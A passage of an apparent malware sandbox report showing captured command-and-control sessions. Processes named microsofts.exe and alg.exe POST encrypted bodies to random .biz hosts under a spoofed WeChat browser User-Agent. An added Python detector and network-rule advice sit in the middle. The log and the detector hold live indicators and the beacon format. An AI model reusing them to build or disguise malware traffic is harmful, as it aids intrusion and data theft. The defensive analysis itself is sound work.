                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.5 | 51573 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:58.469113111 CEST | 357 | OUT | POST /mgsjgpoacwottwhx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:58.469136000 CEST | 778 | OUT | Data Raw: 38 35 b2 91 de 69 e4 ce fe 02 00 00 48 b7 3e 26 20 52 34 e9 df b7 f7 8c b0 7a 9c 23 fe 4e 0c 91 65 09 d6 07 0c f5 bf 15 f2 00 11 98 fb 53 f2 b6 2b ee 97 f2 63 f3 44 9f a2 54 ce 65 56 78 3a 49 e3 2d 27 56 13 79 c7 fc 38 16 50 94 5b d4 37 0c 3d 83
Data Ascii: 85iH>& R4z#NeS+cDTeVx:I-'Vy8P[7=6rrcxNx?Ji0UA\*E|{6&2K.~)%Z/mnP1|rM}.`SE,*Sb*VNP@JB~7'-];
Oct 10, 2024 10:08:59.844531059 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9e8fc99d29310b177e769dd7bf157182|8.46.123.33|1728547739|1728547739|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.5 | 51574 | 34.211.97.45 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:58.906064987 CEST | 354 | OUT | POST /yxnfodxhcdmnj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:58.906217098 CEST | 828 | OUT | Data Raw: 9c ed 18 ec 66 4b 11 10 30 03 00 00 f0 d0 f2 9e 21 2d ae fb 54 02 27 03 17 9a 94 95 5e d5 48 fb c5 0b b5 f8 ab 52 55 b4 21 ae 15 f5 36 62 a9 17 45 bb ef c2 2a 0f 0d 44 4c b6 27 a9 e8 db 6b 51 12 53 ad 2d e9 bc 2a dd 77 00 9e 53 58 c4 60 98 5b 14
Data Ascii: fK0!-T'^HRU!6bE*DL'kQS-*wSX`[\(vFEVZ[MjU:HM\`-2-bAAFx3UwnX1qia@:*`"*K;2kzVk8L\*y-%?PR"-O0
Oct 10, 2024 10:08:59.637713909 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3bdeefc53c5862397a9d455c2affbe9c|8.46.123.33|1728547739|1728547739|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.5 | 51575 | 54.244.188.177 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:59.669430017 CEST | 347 | OUT | POST /lpr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:59.669457912 CEST | 828 | OUT | Data Raw: 72 90 8a 4f d4 fa d6 0a 30 03 00 00 07 1b 77 43 3f 47 dd f6 7c bc 30 ec 69 b8 0d 5c 15 30 87 94 05 08 77 79 74 ef 79 a7 f8 57 63 94 a3 da bf 04 f6 50 25 4d 86 f0 65 70 5c 6e af ef d5 49 85 88 23 50 59 90 6f 54 11 fb 2a 7e 7b 87 41 cd d9 fd 91 c9
Data Ascii: rO0wC?G|0i\0wytyWcP%Mep\nI#PYoT*~{A%v*pY69td90#8j%[dvX1J|,{R.Q%A (J[h;0YQ@V1Hf=9*]bp_%h`:=GFM#)
Oct 10, 2024 10:09:00.396337032 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1afde017a613e93b0f8276f83cb59e49|8.46.123.33|1728547740|1728547740|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
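
The POSTs in sessions 84 through 87 (and the tail of the session above them) share one shape: the same Chrome 39 / MicroMessenger / QQBrowser User-Agent, a short lowercase .biz Host that matches the "queries random domain names" signature, a single random-looking path segment, no Content-Type or Referer, and a binary body. In every captured body the four bytes at offset 8 read as a little-endian integer equal to the body length minus 12 (fe 02 00 00 = 766 for the 778-byte body, 30 03 00 00 = 816 for each 828-byte body). The script below is an added example for this page, not code from the Joe Sandbox report or from the sample; it parses a raw request and reports which of these traits it carries. The length-field reading is an inference from the bytes shown here, not a documented protocol field, and the sample request is reconstructed from session 85 with zero filler for the 816 payload bytes the report does not print; the control request is made up.

```python
"""Flag the C2 beacon shape seen in sandbox sessions 84-87 above.

Added example for this page; it is not part of the Joe Sandbox report and not
code from the sample. The length-field reading (body bytes 8..11 as a
little-endian payload length) is an observation from the captured bodies on
this page, not a documented protocol field; treat it as an assumption.
"""
import re
import struct
from dataclasses import dataclass

# User-Agent string every POST in sessions 84-87 carries (copied from the capture).
BEACON_UA = (
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
    "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict
    body: bytes


def parse_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.1 request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def body_header(body: bytes):
    """Read the 12-byte prefix seen on every captured body: 8 bytes, then a
    little-endian uint32 that equalled len(body) - 12 in every session above.
    Returns (prefix, declared_len, declared_len == actual payload) or None."""
    if len(body) < 12:
        return None
    declared = struct.unpack_from("<I", body, 8)[0]
    return body[:8], declared, declared == len(body) - 12


def beacon_indicators(req: HttpRequest) -> list:
    """Return the traits this request shares with the captured beacons."""
    hits = []
    if req.method == "POST" and req.headers.get("user-agent") == BEACON_UA:
        hits.append("fixed WeChat/QQBrowser User-Agent")
    host = req.headers.get("host", "")
    if re.fullmatch(r"[a-z]{5,12}\.biz", host):
        hits.append(f"short random-looking .biz host ({host})")
    if re.fullmatch(r"/[a-z]{3,20}", req.path):
        hits.append(f"single-segment random-looking path ({req.path})")
    if req.body and "content-type" not in req.headers and "referer" not in req.headers:
        hits.append("binary POST body with no Content-Type or Referer")
    hdr = body_header(req.body)
    if hdr is not None and hdr[2]:
        hits.append(f"length field at offset 8 matches payload ({hdr[1]} bytes)")
    return hits


# Constructed sample: request line and headers of session 85 as captured; the body
# keeps the first 12 bytes printed on the page and pads the rest with zeros (filler,
# the real 816 payload bytes are not reproduced here).
_BODY_PREFIX = bytes.fromhex("9ced18ec664b1110" "30030000")
SAMPLE_BEACON = (
    b"POST /yxnfodxhcdmnj HTTP/1.1\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n"
    b"Host: jpskm.biz\r\n"
    b"User-Agent: " + BEACON_UA.encode() + b"\r\n"
    b"Content-Length: 828\r\n"
    b"\r\n"
) + _BODY_PREFIX + b"\x00" * 816

# Constructed control: an ordinary JSON POST that should raise no indicator.
SAMPLE_BENIGN = (
    b"POST /api/login HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 16\r\n"
    b"\r\n"
    b'{"user":"alice"}'
)


if __name__ == "__main__":
    for label, raw in (("session 85", SAMPLE_BEACON), ("control", SAMPLE_BENIGN)):
        req = parse_request(raw)
        print(f"{label}: {req.method} {req.headers.get('host')}{req.path}")
        for hit in beacon_indicators(req):
            print("  -", hit)
```

Key a network rule on the request side: the 200 responses in sessions 84 to 87 carry only an empty chunked body (30 0d 0a 0d 0a) plus the btst and snkz cookies, so there is nothing in the response payload to match on. The User-Agent string alone is a weak signal, since it imitates a real WeChat embedded browser; the combination with a random .biz host, a random single-segment path and the 12-byte body prefix is what makes the pattern specific.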


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.5 | 51576 | 18.141.10.107 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:00.486808062 CEST | 350 | OUT | POST /ryoeonf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:00.486835957 CEST | 828 | OUT | Data Raw: 0a ca 1d da 35 61 52 93 30 03 00 00 66 1e 36 dc 8f 7a 3f 74 80 03 3a 0a 9d d0 e8 09 59 bb a2 07 b1 84 a2 bb 13 35 84 4f 2a a3 b3 62 1d b1 0d ef f1 26 e8 b9 ec e1 9a be 87 07 09 92 f4 77 c7 a9 ce ea d7 e1 0e 0f 45 a9 52 fa 87 a0 45 8c ad f0 84 23
Data Ascii: 5aR0f6z?t:Y5O*b&wERE#0?M~yN^mzWA{!f;u|x^|]JmTE6gu1,Mtf0[H?(8>_lhTcXN_TKlGjeRq%^{IaDUkW,Q X
Oct 10, 2024 10:09:01.844518900 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c02b687697ca7ce3f9b15e99970f46d9|8.46.123.33|1728547741|1728547741|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.5 | 51577 | 18.208.156.248 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:00.664510012 CEST | 347 | OUT | POST /do HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:00.664521933 CEST | 778 | OUT | Data Raw: 9e af a1 88 0d 7e 1e 96 fe 02 00 00 89 2f 95 06 b0 db 74 95 2a d7 d6 5e 20 1e 16 7d 96 93 9b 57 d8 f9 7e ab a4 0e a5 9c b8 b9 54 c5 27 f4 0e 28 13 e5 17 b6 f1 0f a8 71 7f de 02 1c e6 6f ac 88 d5 5c a0 e3 9e 63 d1 e0 5d 6b cd e4 0f 18 3b 95 0f 36
Data Ascii: ~/t*^ }W~T'(qo\c]k;6{Nhpw*|vB)JssY~S:O9XP9%p;6g<[)<sPjTnML]qW*= ZFRJ-tbL)*d%m>oAT_$Y
Oct 10, 2024 10:09:01.120738983 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c085864dd12caecabdd2942f05d4a5ed|8.46.123.33|1728547741|1728547741|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.5 | 51578 | 44.213.104.86 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:01.686340094 CEST | 354 | OUT | POST /gblimgnlscyku HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:09:01.686352015 CEST | 778 | OUT | Data Raw: dc d7 a4 af 2a 17 a1 c0 fe 02 00 00 f6 87 ae 31 cb fd 2a a6 5c 1e fa f4 60 66 e5 71 a6 78 cd af 60 87 7c 71 48 60 d9 c6 a0 f6 75 cb 9d c3 3e 03 fb 02 32 e0 0f 0c b7 a2 8b 8f e6 bc fa 86 06 41 6b b9 47 ce 80 70 89 05 50 28 92 1b c1 95 d7 2e a3 f1
Data Ascii: *1*\`fqx`|qH`u>2AkGpP(.`.1n^]'LdS'BN.:y rIh*XjXy->&9chnpRcoW!mb+;(g^tiNRa>]JVuL(4
Oct 10, 2024 10:09:02.141824961 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3b57e13b08ef3882665daa09049b93b6|8.46.123.33|1728547742|1728547742|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.5 | 51579 | 18.208.156.248 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:01.862725019 CEST | 351 | OUT | POST /ukwrctauwj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:01.862761974 CEST | 828 | OUT | Data Raw: 89 71 9b 6b 40 5e e2 b3 30 03 00 00 dd 88 52 ea 35 39 e8 7e fd eb 97 59 58 d4 91 46 ec bc 90 93 21 a5 a1 e6 1e e3 6d bf 21 2b 07 77 0e 11 f8 01 c0 ba 0c 8f 75 dc ad d2 88 19 3a 72 bf fb cd 85 9c 49 eb f4 18 70 b9 55 44 6b 25 be 5e 04 e3 44 c7 93
Data Ascii: qk@^0R59~YXF!m!+wu:rIpUDk%^DiddepUy}(a(+k-)TftGd1\!`R ijXuIm/=>f|oG>*e[/OOGbGa%LagnT
Oct 10, 2024 10:09:02.348675013 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a1da9e9d460091b1faf805004880ee5a|8.46.123.33|1728547742|1728547742|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.5 | 51580 | 44.221.84.105 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:02.382262945 CEST | 347 | OUT | POST /bct HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:09:02.382291079 CEST | 828 | OUT | Data Raw: 22 48 45 b3 2b a7 f8 67 30 03 00 00 7c dc 49 ed b4 d7 5a f1 53 47 c9 44 06 9b 53 3a e3 04 7e 3a ff f2 67 f8 a8 a4 b7 71 21 ce 9b 50 9b ed 8c 43 e1 f4 be a3 7e c1 b2 76 ad 68 5e ea 81 bb 25 bd 3e b6 48 e0 88 24 21 03 32 4d 38 9d c7 8b db 40 24 2e
Data Ascii: "HE+g0|IZSGDS:~:gq!PC~vh^%>H$!2M8@$.7MxH~kM*Qpc:nAXd![wGma>} ;(F*nd-:Ok-kK#f}OLGjm%w2yy1m.VQSU$}+It"t4
Oct 10, 2024 10:09:02.848030090 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:09:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6516681091f09a25877080d7a2746045|8.46.123.33|1728547742|1728547742|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.5 | 51581 | 18.141.10.107 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:03.226979017 CEST | 358 | OUT | POST /lxrjyksdgpjxna HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: acwjcqqv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:09:03.227006912 CEST | 828 | OUT | Data Raw: fd 8e fe b4 31 c9 05 b6 30 03 00 00 38 b0 50 91 ab a4 20 d8 86 c6 9c 9e 2d b2 5a 59 d3 8d ef 5b 02 05 92 b2 f6 89 ae 44 b1 c0 c5 cb a7 9b be e4 da 51 53 2e e0 28 a5 7a 95 65 61 24 a5 96 f3 1b 03 a7 60 b2 91 e3 29 4d 36 1a 56 7a cc 92 1a ad 30 fb
    Data Ascii: 108P -ZY[DQS.(zea$`)M6Vz08##``G%*7n>u3a6p0\||r#PH*bI,xzxaI7S3WU*x@~_fW]qP?9,/Jg
Oct 10, 2024 10:09:04.563556910 CEST | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:04 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e4105005a31384579ae41c61baee025a|8.46.123.33|1728547744|1728547744|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.5 | 51582 | 44.221.84.105 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:03.500325918 CEST | 355 | OUT | POST /bdsoixvaivc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: hehckyov.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:03.500325918 CEST | 778 | OUT | Data Raw: 44 cf d8 b2 73 b4 13 7d fe 02 00 00 7c f9 f9 d1 7c ce 84 10 e9 64 dc ea dd d3 3f 5f 1e 5f f0 bd ce b8 dc cd 61 3a fd 16 e3 2e 4a f4 b1 1a 22 41 08 bd 52 6f 12 ca 5c 69 84 e5 f3 41 27 ea 36 80 0a 64 fc 7d b2 04 9d 45 14 92 dc 37 1e 22 8f 8f 5b b8
    Data Ascii: Ds}||d?__a:.J"ARo\iA'6d}E7"[^cstt[qM^(DnB*"PNoh^F4###_3aB07,"+g.JJZZ0hV+{hj0]6O}l:u
Oct 10, 2024 10:09:03.963869095 CEST | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:03 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b729cd4f386ee5a8b2661e98047d10ee|8.46.123.33|1728547743|1728547743|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.5 | 51583 | 44.213.104.86 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:04.592341900 CEST | 345 | OUT | POST /oxda HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vyome.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:09:04.592361927 CEST | 828 | OUT | Data Raw: 73 f8 e9 c4 9d 86 60 43 30 03 00 00 e7 8e ed 4b 2f e8 34 0a 38 69 15 c0 8e 75 6d 53 09 27 1b 64 13 5b 43 98 0f 94 9f a1 bf ea d3 73 73 c3 5f 2e 23 98 32 77 a5 43 59 ff c7 03 68 b2 e3 10 7e 3b 03 20 ce 6e 2d 0d 8f fb b1 5f ff a4 58 cb 3a 32 88 32
    Data Ascii: s`C0K/48iumS'd[Css_.#2wCYh~; n-_X:22loN6c^JPHsnx!($(zxWj8'hNu[i?,&0@DdItdmy!(VIWc!{)B6_<#"7fA^xe^0&
Oct 10, 2024 10:09:05.113225937 CEST | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=08878defb719c4967fe18d506fb67aea|8.46.123.33|1728547745|1728547745|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.5 | 51584 | 54.244.188.177 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:04.630541086 CEST | 353 | OUT | POST /docjrpuoliw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: rynmcq.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:09:04.630645037 CEST | 778 | OUT | Data Raw: e9 6b de 8d 9b 92 f7 d7 fe 02 00 00 25 c7 be 42 85 5d bf 56 67 48 ea 83 62 97 11 db 10 56 7b 07 9a 92 49 99 e9 6b 09 89 af 08 c5 4d 7a 18 24 93 a9 63 02 9b 31 74 5c 14 24 9f cd 93 9b 4a db a4 70 38 55 27 09 78 28 7d b6 fe ff 46 76 9c ed 94 7c 67
    Data Ascii: k%B]VgHbV{IkMz$c1t\$Jp8U'x(}Fv|gmKpwTF~.3sw-!r8@"wmT:E%'8AEU&e|ynM7ZDh XM8qg:HyN[fCH0ra+/Lym18i
Oct 10, 2024 10:09:05.433844090 CEST | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:09:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=b5d9166ebad3852176ca0f626b068b69|8.46.123.33|1728547745|1728547745|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.5 | 51585 | 18.208.156.248 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:09:05.146370888 CEST | 352 | OUT | POST /jebhuwdu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
